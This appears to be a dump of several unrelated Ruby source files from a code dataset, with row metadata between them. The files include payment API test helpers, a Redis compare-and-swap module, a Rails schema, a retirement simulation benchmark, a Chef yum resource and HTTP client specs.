  def assert_transaction_successfully_processing(transaction)
    assert_equal transaction.postback_url, 'http://test.com/postback'
    assert_equal transaction.status, 'processing'
    assert_transaction_successfully transaction
  end
  # Paid transaction that also embeds customer, phone and address records.
  def assert_transaction_with_customer_successfully_paid(transaction)
    assert_transaction_successfully_paid transaction
    assert_equal transaction.customer.class, PagarMe::Customer
    assert_customer_response transaction.customer
    assert_equal transaction.phone.class, PagarMe::Phone
    assert_equal transaction.phone.ddd, '21'
    assert_equal transaction.phone.number, '922334455'
    assert_equal transaction.address.class, PagarMe::Address
    assert_equal transaction.address.street, 'Av. Brigadeiro Faria Lima'
    assert_equal transaction.address.neighborhood, 'Itaim bibi'
    assert_equal transaction.address.zipcode, '01452000'
    assert_equal transaction.address.street_number, '2941'
  end
  # Transaction refused by the acquirer (refuse_reason set, status 'refused').
  def assert_transaction_refused_by_acquirer(transaction)
    assert transaction.id
    assert transaction.date_created
    assert transaction.card.id
    assert_equal transaction.refuse_reason, 'acquirer'
    assert_equal transaction.amount, 1000
    assert_equal transaction.installments.to_i, 1
    assert_equal transaction.card_holder_name, 'Jose da Silva'
    assert_equal transaction.payment_method, 'credit_card'
    assert_equal transaction.status, 'refused'
    assert_equal transaction.card_brand, 'visa'
    assert_equal transaction.card.first_digits, '490172'
    assert_equal transaction.card.last_digits, '4448'
  end
  # Boleto transaction awaiting payment: boleto fields present, no card.
  # (Method name keeps the historical "bolelo" typo; renaming would break callers.)
  def assert_transaction_with_bolelo_on_waiting_payment(transaction)
    assert transaction.date_created
    assert transaction.boleto_barcode
    assert transaction.boleto_expiration_date
    assert transaction.boleto_url
    assert_nil transaction.card
    assert_nil transaction.card_holder_name
    assert_equal transaction.payment_method, 'boleto'
    assert_equal transaction.status, 'waiting_payment'
    assert_equal transaction.amount.to_s, '1000'
  end
  # Four split rules matching the persistent recipients, sorted by percentage
  # (10/20/30/40) so the comparison is order-independent.
  def assert_split_rules(split_rules)
    assert_equal split_rules.size, 4
    rules = split_rules.sort_by(&:percentage)
    assert_equal rules[0].recipient_id, Fixtures.persistent_recipient_ids[0]
    assert_equal rules[1].recipient_id, Fixtures.persistent_recipient_ids[1]
    assert_equal rules[2].recipient_id, Fixtures.persistent_recipient_ids[2]
    assert_equal rules[3].recipient_id, Fixtures.persistent_recipient_ids[3]
    assert_equal rules[0].percentage, 10
    assert_equal rules[1].percentage, 20
    assert_equal rules[2].percentage, 30
    assert_equal rules[3].percentage, 40
  end
  # Plan was created with the canonical test attributes.
  def assert_plan_created(plan)
    assert plan.id
    assert_equal plan.name, 'Plano gold'
    assert_equal plan.trial_days, 5
    assert_equal plan.days, 30
    assert_equal plan.amount, 3000
  end
  # New subscription on a plan with trial days starts in 'trialing'.
  def assert_subscription_created(subscription, plan)
    assert subscription.id
    assert_equal subscription.status, 'trialing'
    assert_equal subscription.plan.id, plan.id
  end
  # New subscription on a trial-less plan is charged immediately ('paid').
  def assert_no_trial_subscription_created(subscription, plan)
    assert subscription.id
    assert_equal subscription.status, 'paid'
    assert_equal subscription.plan.id, plan.id
  end
  # Validation error messages must not end with a dangling comma.
  # NOTE(review): if no ValidationError is raised this helper asserts nothing
  # and passes silently — confirm that is intended.
  def assert_transaction_errors(params = {})
    PagarMe::Transaction.create transaction_with_card_params(params)
  rescue PagarMe::ValidationError
    assert_no_match(/\s*\,\s*\Z/, $!.message)
  end
  # The exception carries at least one error for +parameter_name+.
  def assert_has_error_param(exception, parameter_name)
    assert exception.errors.any?{ |error| error.parameter_name == parameter_name }
  end
  # The exception carries no error for +parameter_name+.
  def assert_hasnt_error_param(exception, parameter_name)
    assert exception.errors.none?{ |error| error.parameter_name == parameter_name }
  end
  # Transfer object is well-formed and uses a known transfer type.
  def assert_transfer(transfer)
    assert transfer.id
    assert transfer.fee
    assert_equal transfer.class, PagarMe::Transfer
    assert %w(doc credito_em_conta ted).include?(transfer.type)
  end
  # All three balance buckets are zero.
  def assert_empty_balance(balance)
    assert_equal balance.available.amount, 0
    assert_equal balance.waiting_funds.amount, 0
    assert_equal balance.transferred.amount, 0
  end
  # Only the available bucket holds funds.
  def assert_available_balance(balance)
    assert(balance.available.amount > 0)
    assert_equal balance.waiting_funds.amount, 0
    assert_equal balance.transferred.amount, 0
  end
  # Only the transferred bucket holds funds.
  def assert_transfered_balance(balance)
    assert(balance.transferred.amount > 0)
    assert_equal balance.available.amount, 0
    assert_equal balance.waiting_funds.amount, 0
  end
  # Available funds grew while the other buckets stayed unchanged.
  def assert_increased_available_amount(previous_balance, balance)
    assert(previous_balance.available.amount < balance.available.amount)
    assert_equal previous_balance.waiting_funds.amount, balance.waiting_funds.amount
    assert_equal previous_balance.transferred.amount, balance.transferred.amount
  end
  # Anticipation limits expose both bounds.
  def assert_anticipation_limits(limits)
    assert limits.maximum.amount
    assert limits.minimum.amount
  end
  # Freshly created anticipation is 'pending'.
  def assert_anticipation(anticipation)
    assert_statusless_anticipation anticipation
    assert_equal anticipation.status, 'pending'
  end
  # Canceled anticipation keeps its shape but reports 'canceled'.
  def assert_canceled_anticipation(anticipation)
    assert_statusless_anticipation anticipation
    assert_equal anticipation.status, 'canceled'
  end
  # Shape checks shared by all anticipation assertions (status ignored).
  def assert_statusless_anticipation(anticipation)
    assert anticipation.amount > 0
    assert anticipation.fee
    assert anticipation.anticipation_fee
    assert_equal anticipation.object, 'bulk_anticipation'
  end
end
| 39.255 | 90 | 0.745383 |
f81e79eaa2e423fcd835dfa79ab43ee36b924e8f | 1,665 | # encoding: utf-8
require 'spec_helper_min'
module Carto
  # Pins the default cartography shipped with the builder. If the definition
  # file changes, this spec fails, forcing a deliberate review of the change
  # (the literal below is the production-approved styling).
  describe 'Default cartography' do
    # Expected defaults for the three "simple" geometry styles.
    let(:production_default_cartography) do
      {
        "simple" => {
          "point" => {
            "fill" => {
              "size" => {
                "fixed" => 7
              },
              "color" => {
                "fixed" => "#EE4D5A",
                "opacity" => 0.9
              }
            },
            "stroke" => {
              "size" => {
                "fixed" => 1
              },
              "color" => {
                "fixed" => "#FFFFFF",
                "opacity" => 1
              }
            }
          },
          "line" => {
            "fill" => {},
            "stroke" => {
              "size" => {
                "fixed" => 1.5
              },
              "color" => {
                "fixed" => "#4CC8A3",
                "opacity" => 1
              }
            }
          },
          "polygon" => {
            "fill" => {
              "color" => {
                "fixed" => "#826DBA",
                "opacity" => 0.9
              }
            },
            "stroke" => {
              "size" => {
                "fixed" => 1
              },
              "color" => {
                "fixed" => "#FFFFFF",
                "opacity" => 0.5
              }
            }
          }
        }
      }
    end
    it 'has stayed the same' do
      # Load the on-disk cartography definition and compare structurally.
      cartography_file_path = Carto::Styles::Style::CARTOGRAPHY_DEFINITION_LOCATION
      cartography = Carto::Definition.instance.load_from_file(cartography_file_path)
      cartography.should eq production_default_cartography
    end
  end
end
| 22.808219 | 84 | 0.325526 |
class Redis
  # simple enhancement of Redis::Store
  class Store < self
    # Implements Compare-And-Swap (or as Redis says Compare-And-Save)
    # on top of Redis::Store using Redis::Store::watch. It is designated for simple values, not redis-lists/hashes etc
    module Cas
      # Single CAS
      #
      # Trys to save change the value of a redis-key when it may not done in a atomic matter. Eg, you have do some
      # checks on old value before setting the new one and so on. If key content changes meanwhile it refuses to
      # set and you will not overwrite changes from other Thread or Process.
      #
      # This method works only on existing keys in redis.
      # It works only with keys holding a value, eg, read/writeable with get/set
      #
      # @yield [value] the current value of given key
      # @yieldparam [String] key the key to get and set the value
      # @yieldreturn [String] the new value to store in key
      # @return [Boolean] true if new value was stored, otherwise false
      # @param key [String] the key to set. Must not be nil and key must exists in Redis
      # @param ttl [Integer] if not nil and integer > 0 set a TTL to the changed key
      # @example
      #
      #   storewithcas.cas('examplekey') do |value|
      #     # value is the CURRENT value!
      #     new_value = do_some_important_stuff_here(value)
      #     new_value # write back to redis unless key has changed meanwhile
      #   end
      def cas key, ttl=nil
        # Missing keys cannot be swapped — bail out before WATCH.
        return false unless exists(key)
        watch(key) do
          value = get(key)
          value = yield value
          # MULTI/EXEC: EXEC is aborted (returns nil) if the watched key
          # changed since WATCH, so the block's SET only lands when the
          # value we yielded is still current.
          ires = multi do |multi|
            multi.set(key,value,ttl.nil? ? {} : {:expire_after => ttl})
          end
          # NOTE(review): assumes redis-rb reports a successful SET as the
          # string 'OK' inside the EXEC result array — confirm for the
          # redis-rb / Redis::Store versions in use.
          ires.is_a?(Array) && ires[0] == 'OK'
        end
      end
      # Multi CAS
      #
      # Safe changing multiple keys at once. It works only with keys holding a value, eg, read/writeable with get/set
      #
      # @example
      #
      #   storewithcas.cas_multi('key1','key1') do |currenthash|
      #     newhashedvalues = make_something_with_current(currenthash)
      #     newhashedvalues
      #   end
      #
      # @example
      #   storewithcas.cas_multi('k1','k2', :expire_in => 1200) do |currenthash| #=> ttl for all keys swapped
      #     {'k1' => '1', 'k2' => 2}
      #   end
      #
      # @yield [values] a key=>value hash with values of given keys. keys not existing are not yielded
      # @yieldparam [Array] keys the keys to change
      # @yieldreturn [Hash] key-value-pairs to change. Keys not given in parameter or not existing in redis are ignored.
      # @return [Boolean] true if tried making changes, nil when keylist empty
      # @param keys [Array] the keys to set. Must not be nil and keys must exists in Redis. After keys list you may append hash with options for redis.
      def cas_multi *keys
        return if keys.empty?
        options = extract_options keys
        watch(*keys) do
          values = read_multi(*keys,options)
          valuehash = yield values
          # Only write keys that existed when we read them; unknown keys in
          # the yielded hash are silently ignored.
          # NOTE(review): each key is written in its OWN MULTI/EXEC, and
          # Redis clears WATCH after the first EXEC — so only the first
          # write appears to be CAS-protected. Confirm this is intended.
          valuehash.map do |name,value|
            multi do |multi|
              multi.set(name,value,options)
            end if values.key?(name)
          end
          true
        end
      end
      # Read list of keys and return values as Hash
      #
      # @param keys Array the keys to read
      # @return [Hash] key-value-pairs of key found in redis, eg, exists.
      #
      # @example
      #   values = read_multi("key1","key2","key3") #=> {"key1" => "1", "key2" => "2", "key3" => "3"}
      def read_multi *keys
        options = extract_options keys
        # Drop keys that do not exist so the result hash has no nil values.
        keys = keys.select {|k| exists(k)}
        return {} if keys.empty?
        # NOTE(review): relies on Redis::Store#mget accepting a trailing
        # options hash — plain redis-rb mget does not.
        values = mget(*keys,options)
        values.nil? ? {} : Hash[keys.zip(values)]
      end
      private
      # Pops a trailing options hash off +array+ (mutating it) and returns
      # it, or {} when the last element is not a Hash.
      # NOTE(review): `is_a?(Hash) && instance_of?(Hash)` — the first check
      # is redundant; instance_of? alone decides.
      def extract_options array
        if array.last.is_a?(Hash) && array.last.instance_of?(Hash)
          array.pop
        else
          {}
        end
      end
    end
  end
end
| 36.981481 | 151 | 0.599399 |
62a2d13a040cb166f9282bf8a976a11dd2c0dfdd | 2,732 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2021_11_02_144705) do
  # ActionText rich-text bodies, attached polymorphically via record_type/record_id.
  create_table "action_text_rich_texts", force: :cascade do |t|
    t.string "name", null: false
    t.text "body"
    t.string "record_type", null: false
    t.bigint "record_id", null: false
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
    t.index ["record_type", "record_id", "name"], name: "index_action_text_rich_texts_uniqueness", unique: true
  end
  # ActiveStorage join table linking blobs to arbitrary records.
  create_table "active_storage_attachments", force: :cascade do |t|
    t.string "name", null: false
    t.string "record_type", null: false
    t.integer "record_id", null: false
    t.integer "blob_id", null: false
    t.datetime "created_at", null: false
    t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
    t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
  end
  # ActiveStorage file metadata (one row per stored file).
  create_table "active_storage_blobs", force: :cascade do |t|
    t.string "key", null: false
    t.string "filename", null: false
    t.string "content_type"
    t.text "metadata"
    t.string "service_name", null: false
    t.bigint "byte_size", null: false
    t.string "checksum", null: false
    t.datetime "created_at", null: false
    t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
  end
  # ActiveStorage pre-processed image/file variants.
  create_table "active_storage_variant_records", force: :cascade do |t|
    t.integer "blob_id", null: false
    t.string "variation_digest", null: false
    t.index ["blob_id", "variation_digest"], name: "index_active_storage_variant_records_uniqueness", unique: true
  end
  # Application table: posts with an ActionText body (see action_text_rich_texts).
  create_table "posts", force: :cascade do |t|
    t.string "title"
    t.datetime "created_at", precision: 6, null: false
    t.datetime "updated_at", precision: 6, null: false
  end
  add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
  add_foreign_key "active_storage_variant_records", "active_storage_blobs", column: "blob_id"
end
| 44.064516 | 126 | 0.735359 |
module Admin::SellerVersion::Contract
  # Reform form for (re)assigning a seller application to an admin user.
  class Assign < Reform::Form
    include Forms::ValidationHelper
    # Bind the form to the :seller_application model key.
    model :seller_application
    property :assigned_to_id
    validation :default, inherit: true do
      # assigned_to_id must be an integer and one of the admin user ids;
      # the lambda defers the User.admin query to validation time.
      required(:assigned_to_id).filled(:int?, in_list?: ->{ User.admin.map(&:id) })
    end
  end
end
| 22.142857 | 83 | 0.7 |
f80e45e218cac7593bc03ee91eb0d54fe3809b32 | 9,161 | module FortuneTeller
class Benchmark
def self.run(context = {})
create_sim.simulate(**default_context.merge(context))
end
def self.default_context
{
growth_rates: {
# these should match the holdings your retirement accounts have:
stocks: [1.06],
bonds: [1.04],
# these are reserved parameters for the simulation:
wage_growth: [1.00],
inflation: [1.02]
}
}
end
def self.random_contexts(num)
possible_returns = (0.90..1.30).step(0.01).to_a
growth_streams = num.times.map do
{
stocks: 100.times.map { possible_returns.sample },
bonds: 100.times.map { possible_returns.sample },
inflation: 100.times.map { possible_returns.sample },
wage_growth: 100.times.map { possible_returns.sample }
}
end
end
def self.create_sim
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 300_000_00,
bonds: 200_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
future_take_home_pay = (sim.initial_take_home_pay * 0.8).round
plan.on(primary_retirement).set(
strategy: :exact,
amount: future_take_home_pay # this will automatically increase with inflation
)
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim
end
def self.create_sim_guaranteed_income
sim = create_sim
sim.add_guaranteed_income do |plan|
plan.on(Date.new(2032, 2, 5)).start(
amount: 500_00,
annual_increase: 1.02
)
end
sim
end
def self.create_sim_percent_spending
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 300_000_00,
bonds: 200_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
plan.on(primary_retirement).set(
strategy: :percent,
percent: 4
)
# plan.on(primary_retirement).set(
# strategy: :dynamic,
# end_year: 2058,
# withdrawal_rates: [3.70,3.78,3.85,3.90,4,4.10,4.20,4.30,4.50,4.70,4.80,5.00,5.15,5.40,5.70,6.00,6.20,6.85,7.30,7.55,8.70,9.70,10.70,12.15,14.15,16.53,20.27,20.27,20.27,20.27].reverse
# )
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim
end
def self.create_sim_tax_sequence
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 120_000_00,
bonds: 80_000_00
}
)
end
sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :roth_ira,
balances: {
stocks: 120_000_00,
bonds: 80_000_00
}
)
end
sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :brokerage,
balances: {
stocks: 100_000_00,
bonds: 100_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
plan.on(primary_retirement).set(
strategy: :percent,
percent: 6
)
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim.set_debit_strategy(:tax_sequence)
sim
end
end
end
| 24.107895 | 194 | 0.534112 |
1dc6af82a8d47cef51844ed7dc6b91531b9a5fe3 | 1,646 | require 'test_helper'
# Integration tests for UsersController: access control for index/edit/update
# and destroy, plus protection of the admin flag from mass assignment.
class UsersControllerTest < ActionDispatch::IntegrationTest
  def setup
    @user       = users(:michael)
    @other_user = users(:archer)
  end

  test "should redirect index when not logged in" do
    get users_path
    assert_redirected_to login_url
  end

  test "should get new" do
    get signup_path
    assert_response :success
  end

  test "should redirect edit when not logged in" do
    get edit_user_path(@user)
    assert_not flash.empty?
    assert_redirected_to login_url
  end

  test "should redirect update when not logged in" do
    patch user_path(@user), params: { user: { name: @user.name,
                                              email: @user.email } }
    assert_not flash.empty?
    assert_redirected_to login_url
  end

  test "should not allow the admin attribute to be edited via the web" do
    log_in_as(@other_user)
    assert_not @other_user.admin?
    patch user_path(@other_user), params: {
                    user: { password: @other_user.password_digest,
                            password_confirmation: @other_user.password_digest,
                            admin: 1 } }
    # Reload from the database: the admin flag must not have been mass-assigned.
    # (Restores the previously commented-out placeholder assertion — without it
    # this test asserted nothing after the PATCH.)
    assert_not @other_user.reload.admin?
  end

  test "should redirect destroy when not logged in" do
    assert_no_difference 'User.count' do
      delete user_path(@user)
    end
    assert_redirected_to login_url
  end

  test "should redirect destroy when logged in as a non-admin" do
    log_in_as(@other_user)
    assert_no_difference 'User.count' do
      delete user_path(@user)
    end
    assert_redirected_to root_url
  end
end
| 26.548387 | 95 | 0.641555 |
d5d6ddea4bd03d3bc11b8c3c9078b83640b4c151 | 7,438 | #
# Cookbook Name:: yum
# Resource:: repository
#
# Author:: Sean OMeara <[email protected]>
# Copyright 2013, Chef
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
actions :create, :delete
default_action :create
# http://linux.die.net/man/5/yum.conf
# The attributes below mirror options of yum.conf's [main] section; nil
# defaults mean "omit the option and let yum use its own default".
# General behavior / prompting.
attribute :alwaysprompt, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :assumeyes, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :bandwidth, :kind_of => String, :regex => /^\d+/, :default => nil
attribute :bugtracker_url, :kind_of => String, :regex => /.*/, :default => nil
attribute :clean_requirements_on_remove, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :cachedir, :kind_of => String, :regex => /.*/, :default => '/var/cache/yum/$basearch/$releasever'
# Terminal color settings.
attribute :color, :kind_of => String, :equal_to => %w(always never), :default => nil
attribute :color_list_available_downgrade, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_install, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_reinstall, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_upgrade, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_extra, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_newer, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_older, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_reinstall, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_search_match, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_installed, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_local, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_remote, :kind_of => String, :regex => /.*/, :default => nil
attribute :commands, :kind_of => String, :regex => /.*/, :default => nil
# Logging / verbosity.
attribute :debuglevel, :kind_of => String, :regex => /^\d+$/, :default => '2'
attribute :diskspacecheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :distroverpkg, :kind_of => String, :regex => /.*/, :default => nil
attribute :enable_group_conditionals, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :errorlevel, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :exactarch, :kind_of => [TrueClass, FalseClass], :default => true
attribute :exclude, :kind_of => String, :regex => /.*/, :default => nil
attribute :gpgcheck, :kind_of => [TrueClass, FalseClass], :default => true
attribute :group_package_types, :kind_of => String, :regex => /.*/, :default => nil
attribute :groupremove_leaf_only, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :history_list_view, :kind_of => String, :equal_to => %w(users commands single-user-commands), :default => nil
attribute :history_record, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :history_record_packages, :kind_of => String, :regex => /.*/, :default => nil
# NOTE(review): yum.conf documents http_caching as none/packages/all, not a
# boolean — confirm against the provider's template before changing.
attribute :http_caching, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :installonly_limit, :kind_of => String, :regex => [/^\d+/, /keep/], :default => '3'
attribute :installonlypkgs, :kind_of => String, :regex => /.*/, :default => nil
attribute :installroot, :kind_of => String, :regex => /.*/, :default => nil
attribute :keepalive, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :keepcache, :kind_of => [TrueClass, FalseClass], :default => false
attribute :kernelpkgnames, :kind_of => String, :regex => /.*/, :default => nil
attribute :localpkg_gpgcheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :logfile, :kind_of => String, :regex => /.*/, :default => '/var/log/yum.log'
attribute :max_retries, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :mdpolicy, :kind_of => String, :equal_to => %w(instant group:primary group:small group:main group:all), :default => nil
attribute :metadata_expire, :kind_of => String, :regex => [/^\d+$/, /^\d+[mhd]$/, /never/], :default => nil
attribute :mirrorlist_expire, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :multilib_policy, :kind_of => String, :equal_to => %w(all best), :default => nil
attribute :obsoletes, :kind_of => [TrueClass, FalseClass], :default => true
attribute :overwrite_groups, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :password, :kind_of => String, :regex => /.*/, :default => nil
# Path of the rendered config file; defaults to the resource name.
attribute :path, :kind_of => String, :regex => /.*/, :default => nil, :name_attribute => true
attribute :persistdir, :kind_of => String, :regex => /.*/, :default => nil
attribute :pluginconfpath, :kind_of => String, :regex => /.*/, :default => nil
attribute :pluginpath, :kind_of => String, :regex => /.*/, :default => nil
attribute :plugins, :kind_of => [TrueClass, FalseClass], :default => true
attribute :protected_multilib, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :protected_packages, :kind_of => String, :regex => /.*/, :default => nil
# Proxy configuration.
attribute :proxy, :kind_of => String, :regex => /.*/, :default => nil
attribute :proxy_password, :kind_of => String, :regex => /.*/, :default => nil
attribute :proxy_username, :kind_of => String, :regex => /.*/, :default => nil
attribute :recent, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :releasever, :kind_of => String, :regex => /.*/, :default => nil
attribute :repo_gpgcheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :reset_nice, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :rpmverbosity, :kind_of => String, :equal_to => %w(info critical emergency error warn debug), :default => nil
attribute :showdupesfromrepos, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :skip_broken, :kind_of => [TrueClass, FalseClass], :default => nil
# SSL / TLS configuration.
attribute :ssl_check_cert_permissions, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :sslcacert, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslclientcert, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslclientkey, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslverify, :kind_of => [TrueClass, FalseClass], :default => nil
# Syslog configuration.
attribute :syslog_device, :kind_of => String, :regex => /.*/, :default => nil
attribute :syslog_facility, :kind_of => String, :regex => /.*/, :default => nil
attribute :syslog_ident, :kind_of => String, :regex => /.*/, :default => nil
attribute :throttle, :kind_of => String, :regex => [/\d+k/, /\d+M/, /\d+G/], :default => nil
attribute :timeout, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :tolerant, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :tsflags, :kind_of => String, :regex => /.*/, :default => nil
attribute :username, :kind_of => String, :regex => /.*/, :default => nil
| 70.169811 | 129 | 0.683383 |
ac6910fed8a5c271c846694c0a18747bf411bca3 | 16,438 | require 'spec_helper'
require 'json'
describe Hyperkit::Client do
describe "module configuration" do
before do
Hyperkit.configure do |config|
Hyperkit::Configurable.keys.each do |key|
config.send("#{key}=", "Some #{key}")
end
end
end
it "inherits the module configuration" do
client = Hyperkit::Client.new
Hyperkit::Configurable.keys.each do |key|
expect(client.instance_variable_get(:"@#{key}")).to eq("Some #{key}")
end
end
describe "with class level configuration" do
before do
@opts = {
:client_cert => '/tmp/cert',
:client_key => '/tmp/key',
:auto_sync => false
}
end
it "overrides module configuration" do
client = Hyperkit::Client.new(@opts)
expect(client.client_cert).to eq('/tmp/cert')
expect(client.client_key).to eq('/tmp/key')
expect(client.auto_sync).to eq(false)
end
it "can set configuration after initialization" do
client = Hyperkit::Client.new
client.configure do |config|
@opts.each do |key, value|
config.send("#{key}=", value)
end
end
expect(client.client_cert).to eq('/tmp/cert')
expect(client.client_key).to eq('/tmp/key')
expect(client.auto_sync).to eq(false)
end
end
end
describe "content type" do
it "sets a default Content-Type header" do
profile_request = stub_post("/1.0/profiles").
with({
:headers => {"Content-Type" => "application/json"}})
Hyperkit.client.post "/1.0/profiles", {}
assert_requested profile_request
end
end
describe "auto_sync" do
before(:each) do
@client = Hyperkit.client
Hyperkit.reset!
expect(Hyperkit.auto_sync).to eq(true)
expect(Hyperkit.client.auto_sync).to eq(true)
end
describe "with module level config" do
it "configures auto-synchronization with .configure" do
Hyperkit.configure do |config|
config.auto_sync = false
end
expect(Hyperkit.client.auto_sync).to eq(false)
end
it "configures auto-synchronization with module methods" do
Hyperkit.auto_sync = false
expect(Hyperkit.client.auto_sync).to eq(false)
end
end
describe "with class level config" do
it "configures auto-synchronization with .configure" do
@client.configure do |config|
config.auto_sync = false
end
